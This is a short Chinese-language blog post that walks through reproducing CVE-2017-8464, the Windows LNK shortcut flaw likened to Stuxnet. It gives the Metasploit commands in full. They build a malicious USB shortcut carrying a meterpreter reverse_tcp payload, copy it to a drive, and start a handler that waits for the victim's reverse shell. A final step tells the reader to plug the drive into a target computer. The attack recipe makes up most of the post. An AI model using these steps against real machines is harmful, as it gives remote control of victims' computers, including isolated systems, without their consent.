CVE-2017-8464(震网三代)漏洞复现

Posted by 杨斌 on 2020-03-26
Estimated Reading Time 1 Minutes
Words 265 In Total
Viewed Times

漏洞介绍

该漏洞的原理同2010年美国和以色列入侵并破坏伊朗核设施的震网行动中所使用的穿透核设施隔离网络的漏洞(CVE-2010-2568)非常类似,「它可以很容易的被黑客利用来攻击基础设施、存放关键资料的核心隔离系统等」。
「当存在漏洞的电脑被插上保存有漏洞文件的U盘时,不需要额外操作,漏洞攻击程序就可以执行并完全控制用户的电脑系统」。

使用工具

metasploit framework.

步骤一: 制作U盘木马

1
2
3
4
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST [ip victim connects back to]
exploit

步骤二: 拷贝木马到U盘

1
cp /root/.msf4/local/* [USB drive path]

步骤三: 开启监听,等待木马反弹

1
2
3
4
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST [ip victim connects back to]
exploit

步骤四: 利用

将U盘插入目标电脑,如果目标开启了外接设备自动播放,木马直接可运行.

参考: https://github.com/rapid7/metasploit-framework/pull/8767


If you like this blog or find it useful for you, you are welcome to comment on it. You are also welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them. Thank you !